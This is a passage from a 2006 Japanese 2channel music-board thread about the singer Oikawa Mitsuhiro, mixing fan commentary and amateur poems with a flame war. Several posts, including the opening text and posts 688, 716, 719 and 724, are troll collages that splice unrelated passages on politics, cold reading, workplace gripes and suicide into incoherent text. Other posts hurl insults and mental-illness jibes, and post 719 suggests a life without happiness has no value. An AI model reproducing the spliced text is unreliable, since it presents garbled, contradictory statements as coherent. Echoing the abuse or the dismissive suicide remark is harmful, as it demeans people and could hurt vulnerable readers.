総合芸術といったところでしょうか?
舞台とか衣装も手がけているみたいだし、正直言えば生見てみたいですね。

辛いだけなら誰もしなくなると思う。趣味板に献血スレがある通り、
趣味で献血する人もいるくらいだから。

確かに針を刺すときは痛いけど、それはその時だけだからそんなに
辛くない。仕事をしているとせっかくの休みの日に時間を取られる方が
ずっと辛いと思うようになる。

表でガンガンキャピりまくって、モラリティや僕のゼリー、あるいは
ココロノヤミで、内部のネガティヴで毒のある歌を聴かせて、

霧の中でに男を見ると、どんな男もグッド・ルッキング・ガイに見える手法が
有るけれど、及川光博は、本物の好い男だから、その振り幅は大きくなると
思います。確かにあの人は麗人。男はどんなに嫉妬するだろうか。

基本理念では、現在の自民党の政治を「『扇動政治』が台頭している」と批判し、
「共生」「公正」の理念に基づき「常識の政治」を行うと宣言した。
そのせいで、思うような仕事が出来ていないんではなかろうか?

及川光博の、及川光博による総合芸術に触れることは、結構なラリだと思う。
もっと聴かせて欲しい。そして良いPVも期待する。
今年デヴュー10周年らしいけど、俳優や雑誌、ラジオ、様々なメディアで、
どれだけ多くの仕事をこなしてきたんだろう。どれだけ多くの人格やキャラクター
を演じて・・・そしてどれだけ多くのファンの心を掴んで煙に巻き、遠くから
まとまったのは組織票しか取れないという所が困る。というわけで今後は
小選挙区の完全実施を求める。あと一票の格差も一対一に是正すべき。
手招きしてきたんだろう。真の好い男のやり方。
もしかしたら小沢は選挙を経ずに、自民を分裂させ政界再編コース
で政権を奪取するかもしれん。いやその可能性が高い気がする。
雲をつかむような、あのもどかしさと夢。

謂わば「ケムに巻く」ようなやり方、及川さんの深淵と文字通り
心の闇を具間見せることで、魅力を増大させる効果があると思います。

688 :NO MUSIC NO NAME:2006/09/15(金) 23:22:26 ID:yc4wiQO8
今の及川は凄く抑えているみたいで痛々しい感じすらする。
及川光博って、いろいろとそういう自分のやり方をすごく押し付ける人なの。
営業センスも指導力も関係ない・・・だから新人ちゃんたちが文句いうのよね。
いつ辞めるかわからないら物品買えない。なんとか、会社からもらったもので今は
まかなってるツマラナイものの全部だったわけじゃない?そういうのを及川光博がしたというのは・・・
及川光博がやったことって、みんな、ホント、隠れた動機があってのことだったのね。
たぶん、心理学的な不安から来てたと思うけど。及川光博は、自分がすごく美男子だとか、
神様からそんなにお恵みを受けたとか、たぶん、自分じゃ思わなかったからさ、
自分の顔を仮面にしちゃったのね。確かに4回目査定が終わった時点で同期の数が1/3になっていました。
まるでもうメチャクチャにしちゃったの。
だから、ああいういろんな小細工みたいなことをしてみたわけ。
物事には割り切りが必要だからね。上に取り入るのは上手いけど、部下からは評価されない。
今まで2回ほど退社願いだしたけど、却下されました。

とにかく肉体的に変身、フリークアウトしようとしたのね。
それが、何ていうか、アタマをオカシクしちゃったのね。
だから、別に・・・それでちょっとの間、メチャクチャやってみたくなったの。
小姑うるさいよね。何もしないならほっといてくれと思う

健全な若い人たちの及川光博中毒の、ベイベ達はそのはしりだったのよ。
日常茶飯事。悪循環だよね。
精神的にしんどいですね…。及川光博なぞ、聴くのではなかった。

以上糸冬 了..._〆(゚▽゚*) 
もう何もない。

689 :NO MUSIC NO NAME:2006/09/15(金) 23:24:58 ID:asElTpPG
ごめん。大人気なかった。詫びる。
非常に凹んだのは確かだし、皆に迷惑をかけて自分にがっかりした。
今一端落としたんだけど変な終わり方になり。
気分が悪く、本当に身の置き所のないような不安感があって。
また立ち上げた次第。

>>685さn 
分りました。一応長い2ちゃん生活でこんな状態は見たことがなかった。
及川光博関連スレをのぞく様になったとき。どこかで、凄く荒されてた。
どこか不明になってしまったけど。
あんな事書いたにも係わらず。暖かな言葉ありがとう。
これどんなに救われる事か。ありがとう。感謝します。

>>687さn
ごめん。色々私情ノイズもあった。個人的に色々とリアルで。
少し言い過ぎた。もう取り消しは効かないが。
今冷静さを取り戻した。

690 :NO MUSIC NO NAME:2006/09/15(金) 23:25:59 ID:n3JIHiUS
本人ならともかくな。
10周年で原点ともいえる歌関係の板でこんなん・・
何度でもコピペしなよ。
見ててあげる。好きな歌が嫌いになるまで聴くのと一緒。
私はあんたと一緒にあぼーんしてもいい。

691 :NO MUSIC NO NAME:2006/09/15(金) 23:27:18 ID:LH1WB/Aq
及川光博のファンってこんなんばっかりか?
自由に2ちゃんで話もできない。
これもコピペされて汚されるんだろうけど。
及川光博なぞ、聴くのではなかった。

以上糸冬 了..._〆(゚▽゚*) 
もう何もない。

692 :NO MUSIC NO NAME:2006/09/15(金) 23:28:39 ID:asElTpPG
>>690
こっちはゴメンだ!勝手に氏ね

>>691さn
ごめん。色々私情ノイズもあった。個人的に色々とリアルで。
少し言い過ぎた。もう取り消しは効かないが。
今冷静さを取り戻した。

693 :NO MUSIC NO NAME:2006/09/15(金) 23:30:35 ID:ypQFrs+0
>>690
悪いけどアンタが来るまでは平和なスレだったんだよ
疫病神は消えてくれないかな?
どうしても粘着すんなら最低限コテハンにしてくれよ、お望み通りあぼーんすっからさ

694 :NO MUSIC NO NAME:2006/09/15(金) 23:33:26 ID:asElTpPG
>>690
被害者面ギザウザス(^ω^)
あんたが消えればギザウレシス(^ω^)

〓しょうこ〓

695 :NO MUSIC NO NAME:2006/09/15(金) 23:48:33 ID:vNI1hXuI
ID:asElTpPG
アッチ(・∀・)イケ!!

696 :NO MUSIC NO NAME:2006/09/15(金) 23:52:30 ID:asElTpPG
ID:n3JIHiUS
アッチ(・∀・)イケ!!

697 :NO MUSIC NO NAME:2006/09/15(金) 23:53:11 ID:twVnSUB8
ID:vNI1hXuI
アッチ(・∀・)イケ!!

698 :NO MUSIC NO NAME:2006/09/15(金) 23:55:19 ID:ghzXGEpt
ID:asElTpPG
アッチ(・∀・)イケ!!

699 :NO MUSIC NO NAME:2006/09/15(金) 23:55:56 ID:asElTpPG
ID:n3JIHiUS
アッチ(・∀・)イケ!!

700 :NO MUSIC NO NAME:2006/09/15(金) 23:56:41 ID:jUPR2DgK
ID:asElTpPG
アッチ(・∀・)イケ!!

701 :NO MUSIC NO NAME:2006/09/15(金) 23:57:18 ID:asElTpPG
ID:twVnSUB8
アッチ(・∀・)イケ!!

702 :NO MUSIC NO NAME:2006/09/16(土) 01:02:52 ID:MAqEShVR
荒らしウゼ

703 :NO MUSIC NO NAME:2006/09/16(土) 02:07:00 ID:QsYxrqeb
>>693 平和なスレ?どころか、ただの無駄スレだったのが、
良くも悪くも >>690のおかげで活性化してたんだよ少なくとも。
ともあれ、これが大方の総意だと思うが↓
http://human5.2ch.net/test/read.cgi/uwasa/1157419720/693

大祭が終結してからは、
短文で少しずつ会話しているし、害はない筈。
実質的に粘着なのは、荒しの方だという事は、
ここ数日の流れを冷静に見ていれば、一目瞭然。
間違った標的をスケイプゴートにするなんて歪んでるよ。
所詮こんな場所ではあるけれど、胸を張れないような事は止めて欲しい。
少なくとも >>690は、常に正々堂々とやってる。

704 :NO MUSIC NO NAME:2006/09/16(土) 02:26:45 ID:RnKaJHaR
本人乙。早く精神の病なおしなさいよ

705 :NO MUSIC NO NAME:2006/09/16(土) 03:11:45 ID:cVahdWkk
精神か。精神科医。
皆。クドリャフカを忘れているだろ?
ttp://ubonpage.at.infoseek.co.jp/Kudryavka.html
少し長いがみてくれ。

だがしかし及川光博は歌詞が秀逸。
あんなんが10年前?
PV見ても古さを感じないし歌詞もその通り。
ベイシティローラーズとかシンディ・ローパーなんか見てみろ。
古さ全開だぞ。

706 :NO MUSIC NO NAME:2006/09/16(土) 03:20:57 ID:cVahdWkk
ぉぅ。
膝突き合わせてベイベな人たちと
及川光博の音楽と詩やパフォーマンスについて語りたい。
それが偽らざる私の本意だ。他意はない。
この記念の年に何かを語り合って及川光博を前進させ
ベイベたちの今後の及川光博に対する期待とか
良い事いっぱい話したいと思ってね。
粘着とでも何とでも一切合切言われるのは結構。
もう初めからそう自分でも思ってる。そんなこたー覚悟の上だ。
自分痛いぞ。シツコー。ウザー('A`)・・・・・な?
いいか?ここは音楽について話を汁板だぞ。
嵐や人の揚げ足取って。

まあいいな。

707 :NO MUSIC NO NAME:2006/09/16(土) 03:26:07 ID:VS6UHiib
いいか?ここは音楽について話を汁板だぞ。
オマエと>>703の交換日記帳じゃないんだよ、どっかにオナヌーblogでもオナヌーサイトでも作ってそこでやれ

708 :NO MUSIC NO NAME:2006/09/16(土) 03:28:49 ID:RnKaJHaR
シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・

シツコー。ウザー('A`)・・・・・


709 :NO MUSIC NO NAME:2006/09/16(土) 03:47:11 ID:cVahdWkk
深夜までいぢわるだなw
まあいいや。しつこくてウザイのは。
引き続きます覚悟汁

710 :NO MUSIC NO NAME:2006/09/16(土) 03:49:54 ID:cVahdWkk
ああ、交換日記って、及川の話してるだけだろ?
ってか、もともと人少ないだろ?
なんか数人でいろいろゴニョゴニョやってって。
楽しいな。人に煙たがられて嫌悪されるのって結構なんていうか。
XTCだな。

711 :NO MUSIC NO NAME:2006/09/16(土) 03:51:48 ID:cVahdWkk
もしや。
ベイベは実は及川の話させたくないんだろうな。
独り占め?
イイネソレ!

712 :NO MUSIC NO NAME:2006/09/16(土) 04:01:18 ID:LyN1vsU4
自分もミチーの音楽や歌詞の話がしたい。だからレスするよ。

cVahdWkkさん、もしそれほどまでにミチーの世界観が気に入ってくれたなら
「うたかた。」という詩集もぜひ読んでみてほしいな。こっちはまだ新品を買えるはず。
ミチーの詩と阿部薫師匠(長くサポメンとして参加してくれてるドラマー)の写真で構成された本。

うたかたツアーでは毎回、ライブ前に20分で作ったという詩を1つずつ朗読してくれてて
この本はそれらの詩を集めたものなんだけど、純粋にいい詩がたくさんつまってるよ。
詞ではなく詩だけどね。


713 :NO MUSIC NO NAME:2006/09/16(土) 04:18:00 ID:bqEN2o3z
>>705
いいもん見せてもらったアリガトウ!
このエピソードは何となく知ってたけど、
こうやって見ると…改めてくるものが…。
哲学的だね。
わんこには、地球管制塔への最期のメッセージなんて、
残せないもんなあーーー


714 :NO MUSIC NO NAME:2006/09/16(土) 04:58:53 ID:QsYxrqeb
>>706 頼もしいね。有難い。
今後の期待か。どんなんだろな。
…こう来たか!って、いっつもずっとびっくりさせられてるからなぁ。
常に予想外。
でも面白いことに、常にある意味それが =ドンピシャ。

>>574-577みたいな感じの展開も、10年前には想像もつかなかったことだけど
今のミチーのことを思うと、これが正解だろうと、非常に納得できる。
細かいところでは文句も多々あるにはあるけど、
この納得さ加減が、永々と観続けてるひとつの要因でもあるかな。

715 :NO MUSIC NO NAME:2006/09/16(土) 05:28:33 ID:IQZ1PPDr
まるで嘔吐しながら満漢全席を腹いっぱい食らった感があるな。
金閣寺の心理だ。最期は。あの遺物の最期は。
美しいものを壊したくなる。
最期は。あの遺物の最期は。
引き裂いてやろうか。火あぶりの刑にしてやろうか。
曖昧なセクシュアリティーが境界線上で揺らめいてる…みたいなところが
いい感じにはじまって、フェードダウンしながら暗転して。
読む読まないとか知った事ではないね。

見たくないなら見なければいい。
もし押し付けてくるように文字が迫ってくるなら。一種の強迫観念だから。
Drに相談するかあるいは。2ちゃんを止めることだね。これは基本的な
事だろう?帝国なる自分達の世界があるようだし。何もここでこんなイタイ文章を
煽る事はないだろう?それとも自分のままならない現実を逃避して人を意のままに?
まぁ。2ちゃんは私のものでもないけどな。
私は貴方が私を誤解して嫌っても。同じ歌を何度も何度も嫌になるほど聞かせて発狂

眉を顰めるそのベイベの表情を想像するのも一興だ。
見 て み な その恐い顔。

ただそれだけの話だ。
XTCググレカス

716 :NO MUSIC NO NAME:2006/09/16(土) 05:33:00 ID:vXL1FjnK
>>712 頼もしいね。有難い。
今後の期待か。どんなんだろな。
今の及川は凄く抑えているみたいで痛々しい感じすらする。
及川光博って、いろいろとそういう自分のやり方をすごく押し付ける人なの。
営業センスも指導力も関係ない・・・だから新人ちゃんたちが文句いうのよね。
…こう来たか!って、いっつもずっとびっくりさせられてるからなぁ。
20代なら未熟、30代ならがんばれ、40代ならちょっとやばいぞ。

>>690-694みたいな感じの展開も、10年前には想像もつかなかったことだけど
山登りに行って、「頂上はまだー?」とか聞いて「もう少しだよ」
って、何度もはぐらかされるような感じがした。
今のミチーのことを思うと、これが正解だろうと、非常に納得できる。
細かいところでは文句も多々あるにはあるけど、
健全な若い人たちの及川光博中毒の、ベイベ達はそのはしりだったのよ。
日常茶飯事。悪循環だよね。
また十分調査も実はしていないのに、堂々と否定している。

717 :NO MUSIC NO NAME:2006/09/16(土) 05:36:21 ID:p0DE0nQ9
金払って買って読んだんから感想を言わせてもらう。
本は楽しく読めたが、率直な感想は「これはことば遊び」に過ぎない。
ということだな。
イカサマ教祖と占い師が使う秘密のテクニックというが、実際彼らはこんな技術は使わない。
占い師なら、未来を当てなくてはならない。コールドリーディングでは、
「子供の病気は助かるのでしょうか?」
「いつ頃治るのでしょうか?」
「会社の経営が危ないのですが、取引先の現金払いを来月まで待ってもらう事を、先方はOKしてくれるでしょうか?」
「第一志望の学校に合格するでしょうか?」
「選挙は当選するでしょうか?」
「行方不明の妻は無事に帰りますでしょうか?」
「夫の挙動不振の原因は浮気でしょうか?」
「結婚できる年令はいつ頃になりますか?」
「今の彼氏と結婚できますか?」
など、占い師に相談してくるような話には何一つ答えられない。
勿論、適当にものは言えるが「未来を当てる」ことはコールドリーディングでは不可能。二択の判断すら当たらない。
これじゃイカサマ占い師にすらなれない。
でも、性格や過去は当てられるけど、「未来のことは悉くハズレる占い師」にはなれるがね。
要するに心を見抜くだけの人なら。
所詮はぐらかしと言葉のマジック。コミュニケーションのおもしろ雑学だよ。実際こんなテクニックを日常で使用してたら、
「あいつはいつも会話をスリ替える・・・」
と言われること受け合い!!
信用をなくす。
だけどあれは心を見破られたと錯覚させるだけで、実際インチキ教祖や占い師にはなれないよ。
実際に使ってみればなかなか楽しいだろうとは思うがね。それだけ。
あの仕組みと絡繰りを蘊蓄として人に語ってみせる方が、コミュニケーションには役立つかもね。
特に相手が占いを信じない人や、宗教嫌いな人だと「なる程〜!」と関心してくれるだろう。
それと、常識的判断による予想は、例え二択問題でも将来どう展開するかは解らないし。
本人の性格から予想される言動が解っても対人関係には相手がいるし、人事の悩みなら会社の
会社の方針があるし、病気には寿命、試験や選挙には未知の敵、競争相手がいる。
結局は運勢判断すらできない。これだと、インチキ占い師としても食い繋げない。教祖も無理だろうな。

718 :NO MUSIC NO NAME:2006/09/16(土) 05:39:22 ID:RDqLm0GV
あれ?このプロセスって何かに似ているな。
あと>>690さんは、ひとつのテクを見破って油断したのかもしれない
なぜ否定派のコールドリーディングがうまいのか。

それは、セミナー屋がコールドリーディングと呼ぶ現象は
実際には昔からさまざまな学術分野で研究されていたから。
だからその分野の専門家がコールドリーディングを知ると
「こんなの俺達がずっと前から研究してたことジャン」と感じる。
だからよく知っていて当然。

セミナー屋はそれらの研究の一部(全部を模写することはできなかった)を参考にして
自分らで考えた技法をそこにつなぎあわせて"コールドリーディング"として売り出した。

コールドリーディングはさまざまな研究分野のつぎはぎと
根拠のない独自技法を組み合わせたパッケージに過ぎない。


宣伝吹聴することがおろかなんだよ

この言葉は、すでに>>690のバインドにかかってしまっている
「愚かなのか、そうでないのか?」っていうバインド、価値観にね。
だって>>679さんはそれまで愚かなんて言葉は使っていなかったんだから
「矛盾」とかって言葉使ってたよね

でも「矛盾」と「愚か」

どちらも批判する言葉なんだけど、意味合いはやっぱり違うし、各々の言葉の持つイメージも
違う

こうやって少しずつ、少しずつひとは誘導されてしまうのよ。

719 :NO MUSIC NO NAME:2006/09/16(土) 05:42:07 ID:IQZ1PPDr
ジョーは酒場で心理学の教授と知り合った。
「心理学ってのはどういったもんですか?」
「やって見せましょうか。お宅には芝刈機があります?」
「ありますよ」
「ということは、広い庭があるわけですね?」
「その通り!うちには広い庭があります」
「ということは、一戸建てですね?」
「その通り!一戸建てです」
「ということは、ご家族がいますね?」
「その通り!妻と2人の子供がいます」
「ということは、あなたはホモではないですね?」
「その通り!ホモじゃありません」
「つまりこれが心理学ですよ」
「なるほど!」
深く感心したジョーは、翌日友人のスティーブに言った。
「心理学を教えてやろう。君の家には芝刈機があるか?」
「いや。ないよ」

死にたい!だけで理由もいわねば解決にもならない
まぁどうせ人生に疲れたとかだろうけどね。
自分を必要とする人間がいないことやSEXにしか興味がもたれないとかで
自己嫌悪したり人間が信じられなかったり。
平和な世界に生きてる割に幸せを感じていないのじゃ生きてる価値ないとね。
子孫を残しその育成のためだけに生きる。そんなDNAの意思に逆らいたくなって
死という絶対的自由であり完全束縛の世界に逃れようとしているのでしょう。
でも今は生きてる。これからも生きることはできるだろう。
そう、死ぬまでね。
いやなら人間社会を飛び出すのもいいと思うよ。
他の国に行けば物価は安い。
人間だって日本ほど冷めてはいない。
目的を探してその目的を追求して死ぬまで生きればいいじゃないか。
生きるためなら「ヲタクの国」に行くのもいいかもね。
その国の人は独自の世界でみんな「生きてる」から。
なぜ?をもつことはいいことです。
しかし、それでは前にすすみません。
前に進むためには、How転回をしなければいけません。
科学的とはどういうことですか?
それはなによ、死んだ自分の体に→なる なんて
生き残ってる他人からはそうみえるってことか?
自分なんかもうないのに…いない、ではなく、ないのに
天地創造のおり、神様が人々に言葉を賜った。だから、もともと言語は一つであったというのだが。

720 :NO MUSIC NO NAME:2006/09/16(土) 05:44:55 ID:p5iNwsaV
>>488
エスは自我の一貫性を保つために必要なのです。
しかし、このため人間は自分の人格の大部分を見失ってしまっているのです。
人間は自分の自我のことを自分の全人格だと誤解しています。自分からはエスは見えませんから。
でも実際には自我は自分のごく一部分でしかありません。

死を身近に感じている野心家ほどタチの悪い奴はいない。
野心家の爺や婆は兎に角自分の名前を残すことで必死である。
そのためには手段を選ばない。好々爺になれないで、迷惑を
振りまいて死んでいくのだろう。残された我々はその死後
処理で大変なのだ。奴等はそれなりに学会などの貢献者として
名を残す。その背後にどれだけの犠牲があるかを考えて欲しい。

この場合、自然・不自然というのは、どういう意味で自然・不自然なんだろうか。

人間は「自己」という自分の物語を作りながら生きている。
「自己と世界についての物語」と言った方がいいかもしれないが。
人は皆
「自分はこうして生きてきて今こんな事をしていてこれからこんな風に生きたい」
という物語を作りながら生きている。
自然・不自然というのは、この物語にとって自然か不自然かという事だろうか。
もしそうなら、その事自体も物語りの一部になっていく事になるだろう。
という事は、結局、物語の出来、あるいは物語の作り方に
「自殺するしない」の問題の原因があることになるのだろうか。

721 :NO MUSIC NO NAME:2006/09/16(土) 05:47:16 ID:p1fJG5xz
あらゆるものを見てヒキコモリを連想してしまう私。
たとえば、カタツムリを見て、ヒキコモリみたいだわ、と思い、
寝ぼけている人をみてヒキコモリっぽいわ、と思い、
「引き込む」という言葉を聞いて、「引きこもる」と聞き間違えてしまう。
いまや、NHKは日本テレビはヒキコモリ・テレビジョンと化し、
YAHOOニュースはヒキコモリ・ネットニュースと化す。
こんな私って変かしら、それとも正常?
誰かおしえてーーーーーー
自閉症はひきこもるだけじゃない!!
私も、光とともにって漫画を読んだんです。

お母さんも、いろいろ悩んで、だんだんと、光君をたいせつにして
料理や、会話だって、すこしはできる。


自閉症は生まれつきの障害でしゃべれない人もいるそうです。
パニックを起こしたり、時には、とんでもないことをします。
しかし、ぜったいになおせないわけじゃない・・・。

なんだか、このダイメイが嫌です

722 :NO MUSIC NO NAME:2006/09/16(土) 05:48:22 ID:rYLJ7DO1
>>711
対人恐怖は元々は日本特有というか欧米にはなかったらしい。
日本人は元々他人(顔見知り)の評価を非常に気にする。
他人から是認される事が自分の精神の安定を支えている。
だから他人の評価が気になるし、自分を評価する他人に恐怖する。
日本人が「対人恐怖」を持っているのはまあ当然といえば当然の事。

欧米では以前から神が欧米人の精神の安定を支えていたので
欧米人は神の評価を気にするし、神を恐怖する。
いわば、欧米人は「対神恐怖」を持っている。

723 :NO MUSIC NO NAME:2006/09/16(土) 05:50:09 ID:rYLJ7DO1
そのとおりです
その言葉や概念が人間行動を制御する機能をもつとき
関係が生じるのです
日本語を知らない人は日本語に何も制御されませんが
日本語を母語とする者には、日本語は制御機能をもつわけです
これと同じことです
関係はあります

724 :NO MUSIC NO NAME:2006/09/16(土) 05:55:52 ID:E+jkpeCN
自分もミチーの音楽や歌詞の話がしたい。だからレスするよ。

ID:vXL1FjnKさん、もしそれほどまでにミチーの世界観が気に入ってくれたなら
もう更新する必要ないじゃん。肯定的なサイトでもID:vXL1FjnKさんみたいに定期的には珍しいよ
ぶたくさの庭は肯定的なサイトだけどストップしてる
本当はアンチは一人しかいないんだ
複数に見えるのはソイツが自作自演してるから
ソイツの正体はID:vXL1FjnK本人なんだろ?

このスレは女性専用車両みたいなものです。マトモな人はレスしません。
オバサンがいっぱい入ってくる女風呂なんです。

オバサンのオケケが浮いています。
オマケに生ぬるいんですが、それでも入りたいですか?
要するに、検証可能で実証的な研究があるのか、ということだろう。

725 :NO MUSIC NO NAME:2006/09/16(土) 08:35:41 ID:MAqEShVR
朝っぱらから荒らしてる暇人いい加減巣に帰れよ。
どーせ普段ここなんか見ないし書き込みもしてないんだろ?
噂スレでベイベ叩きでもしてろよ。

726 :NO MUSIC NO NAME:2006/09/16(土) 13:00:07 ID:aA4hEOSO
>>725
目の前に病気が迫ってるならとも考えるが、辻褄が合わない。
病気だからって必死の形相でレスする理由がない。
目の前に死が迫ってるのか、日常の生活まで心配させられるほどの精神状態に思えた。
あのおばさんに何があったのだろうか・・・。あの赤ジャージを上下に着込んでまで
必死にあるく必要はどこにあったのだろうか・・・。不可解だ・・・。

727 :NO MUSIC NO NAME:2006/09/16(土) 14:16:03 ID:49XoLevl
松永久秀という男を知っているだろうか?
彼は及川光博ににている、いや及川は生まれ変わりかもしれない。おそらく歴史に興味のない人
は聞いたこともないはずだ。しかしこいつほどファンキーでアナーキー
な奴はおらず、日本史上の歴代悪人コンテストをしたら五本の指に入る
のでは?と思っている。まあどれぐらい悪人か?久秀と同時代を生き、
一時は久秀の主人となった織田信長の言葉をかりて言ってみるとこう
だ。
 「この久秀という奴はとんでもない奴だぜ。将軍は暗殺する、
自分の主君を裏切り死に追いやる、奈良の大仏を焼きその首を落とす。
昔よりこれらの一つでもすれば歴史に名が残る悪人なのに、
三つ全部やった大悪人はこいつだけだぜ。」これは、信長が徳川家康
に久秀を紹介するときに言ったとされる内容である。
しかし、信長にこれだけのことを言わすとはたいしたもんである。

あぁ麗しの君よ。ベイベに感謝、そして乾杯

728 :NO MUSIC NO NAME:2006/09/16(土) 16:28:21 ID:QsYxrqeb
ミチーは、明智光秀が好きって言ってたことがあるよー
「ミッチーだから」って、半分シャレだったかもしれないけど。
でも、更に尤もらしい理由を喋ってたこともあったかも。
(どんなか忘れちゃったけど。)

729 :NO MUSIC NO NAME:2006/09/16(土) 22:33:10 ID:BR3i1jMp
>>712-713とか>>714さnとか

ぉぅぉぅ。今日も話しをしに来たぞ。
嵐朝早いな。農家のおじいさんかな。
だってすごい素直に仕事をしてるから。

クドは、結構泣けるしなんか少し及川光博と被る気がしてた、今は違う。
イチゴはイーディの言葉。及川光博がそのまま当てはまる。

言っておくが私は及川光博の僕でも奴隷でもない。

730 :NO MUSIC NO NAME:2006/09/16(土) 22:38:25 ID:BR3i1jMp
今日ハタと気付いたんだ。
ああ。この人は。
歌を聴かせたいのではなく。詩を聴かせたいのだなと。
音はそのニュアンスを表し。
肉体的なパフォーマンスでそのフォースを現すのだなと。

なんか、詩を物凄く大事にしているぞ。この人は。
ねえ とか ああ、いえ とか   偶然入るような言葉も大事に音に乗せている。



731 :NO MUSIC NO NAME:2006/09/16(土) 22:42:16 ID:BR3i1jMp
ベイベたちにとっては全部が珠玉の逸品なんだろうけど
私には何曲かエクセレントな曲があって
全部の詩はブリリアントだった。

うたかたという本には興味はあるが。
及川光博の言葉は音に乗って語られるからこそ生きて動き出す気がする。
あの人は何か憑依したように詩を歌う。
やはりこれも初期の頃のが御幣はあるが「酷い」






732 :NO MUSIC NO NAME:2006/09/16(土) 22:42:56 ID:Kvq2a6EF
彼女の夜は、一杯の麦茶を用意することで始まる。
伊万里焼きの小さめのボウルにいくつもの氷を放り込み
薫り高い冷えた麦茶をなみなみと注ぐ。
まず一口。   うまい。
今日は特別に作っておいた、いちじくのゼリーに匙をいれたところで、
彼女はメッセの光が橙色に光っているのに気がついた。
地下組織ボスからの連絡である。
「はい、ボス」
「了解しましたボス」
手短な指令を受けた彼女は、ため息をついて今日見る予定だった
過去ログ倉庫のスレッドを消し、締め切りがすぎた○○○スレッドを
ダウンロードした。
地下組織雑用係の夜が更けていく。

ボスの名前は未だに知らない。
どこからともなく詩板のあちこちのスレッド情報を伝えてくるのみであった。
驚くほど情報量が多く、どうやら蜘蛛の巣のようなアンテナを張り巡らしているらしい。
どうして彼を無条件に信頼してしまうのだろうかと、
いつものように不思議に思いながらも、ついついメッセの光がつくのを待つ彼女であった。

今日の指令は、ボスの詩の評価をつけろということであった。
例によって、どの詩とは言わない。(言うと面白くないらしい)
丹念に読みながら、うーーーーむと頭を抱える。


わからない。。。


733 :NO MUSIC NO NAME:2006/09/16(土) 22:44:21 ID:Kvq2a6EF
ヨクバリナアイジョウ

例えばあなたとけんかして
憎まれ口たくさん叩いたとして
たとえばあなたの悪い部分が
あなたを支配し悩ませ続けても

あなたがあたしを愛する限り
あたしはあなたを愛しているよ

例えばあなたが罪を犯して
世界中の誰からも憎まれたとして
例えばあなたが欲望に負け
あたしの前から姿を消しても

あなたがあたしを愛する限り
あたしはあなたを愛しているよ

734 :NO MUSIC NO NAME:2006/09/16(土) 22:44:55 ID:BR3i1jMp
>>679 
よ く で き ま し た

皆さん。クラップ・ユア・ハンズ

735 :NO MUSIC NO NAME:2006/09/16(土) 22:45:07 ID:Kvq2a6EF
あんまりあたたかすぎて
消えてしまいたい恋のフレーズ
飴玉舐めて眠るバスタブ
真昼の空に溶けだした
甘い甘いシャワーさ
あのこが気づいて傘さしたら
それ 排水溝に逃げ込めよ

あんまりとつぜんすぎて
消えてしまいたい恋のフレーズ
コーヒーの渦を泳ぐピラニア
時計の針を追いこした
苦い苦いスクリューさ
あのこがミルクを探す前に
ほら 冷蔵庫で待ち伏せろよ

はやくあのこに見つけてほしい
甘い恋のフレーズ
試行錯誤の31個目
やっと言葉になっても
はやくあのこに捕まりたい
甘い恋のフレーズ
鼓動に追い抜かれて
やっぱり空に消えた

 茶畑の小径で写生をしていた
僕のそばを
 自転車で通り過ぎていった君
 朝靄の乳白色を
 黒い鉛筆はもやもやと写した
 君は僕の絵を見ようとしたから

このエゴが蔓延した弱肉強食の修羅世界で
彼女と出会えたことは
本当に奇跡としかいいようがない。
私の希望を彼女の中に見出す。

彼女の海のように深くて広い愛情と、打算のない心によって、
私は人間をもう一度信じてみようという気になったのだ。

ああ、私はあまりにも長い間苦しんでいた。
人間不信の虚無の世界に生きていた。

ああ、神様。私の流した血をようやく
認めてくださったのか。

神様、私はあなたをずっと慕って求めてきました。
どんな困難障害にもあなたのお計らいを見出しここまで生きてきました。
あなたはそれにお応えくださった。
ついに門は開かれたのだ。

私が彼女を一生守ることがあなたのご意志だと信じて
これからなにがあろうとも二人で乗り越えていくことを誓います。

あなたの名誉にかけて。

736 :NO MUSIC NO NAME:2006/09/16(土) 22:46:49 ID:Kvq2a6EF
残りの手は無限
  ヤクバハイル
 
何かが欠けている
それとも多すぎる
とけあう夢など
とうに諦めた

誰もが隔てなく
見上げる青い空
木々のきらめきや
小鳥の歌声

胸にポツリと空いた風穴は
そう
友情だけでは埋められやしない

だけど私たちは出会ってしまった
鏡を見るように重なる魂
舞い散る桜

737 :NO MUSIC NO NAME:2006/09/16(土) 22:47:27 ID:BR3i1jMp
>>679

確かに4回目査定の〜 のところが一番良く出来てる。

738 :NO MUSIC NO NAME:2006/09/16(土) 22:47:42 ID:Kvq2a6EF
愛する貴方に荊の冠を
禁断の実から甘い酒を
長い髪に天使の嘆きを
脚元に悪魔の接吻を
アリアドネの糸は切れ
薔薇の迷宮に堕ちるだろう
貴方に溺れる快楽を
頬伝う血は邪神の誓約
刹那は星空に舞い
果てし無き永遠に続く
Oh I'm insane
sweet nightmare
腐敗した欲情が支配する
鎖繋がれた奴隷
背徳の吐息に崩れ落ち
耽美の夜に唯跪く…

739 :NO MUSIC NO NAME:2006/09/16(土) 22:49:09 ID:Kvq2a6EF
>>737
思いっきり素人なんで、基本的に”味わう”というのを主眼にしています。
まず浸る。雰囲気に浸り、それから内容を推測し、その雰囲気がどうやって構成された
かを考えてみます。
ただ、今日、どこかで読んだんですが、”君の作品を友人に読ませてはいけない、
どんなにその友人が良い人間であっても、知らず知らずのうちに、彼の好みの
文を書くようになっていき、いつかは自分の書きたいものを書けなくなってしまう。
素人の評ほど怖いものはない。”というレスがあって、かなり反省した次第です。

740 :NO MUSIC NO NAME:2006/09/16(土) 22:49:39 ID:Kvq2a6EF
仮面で包み隠した
野蛮で残酷な本性は
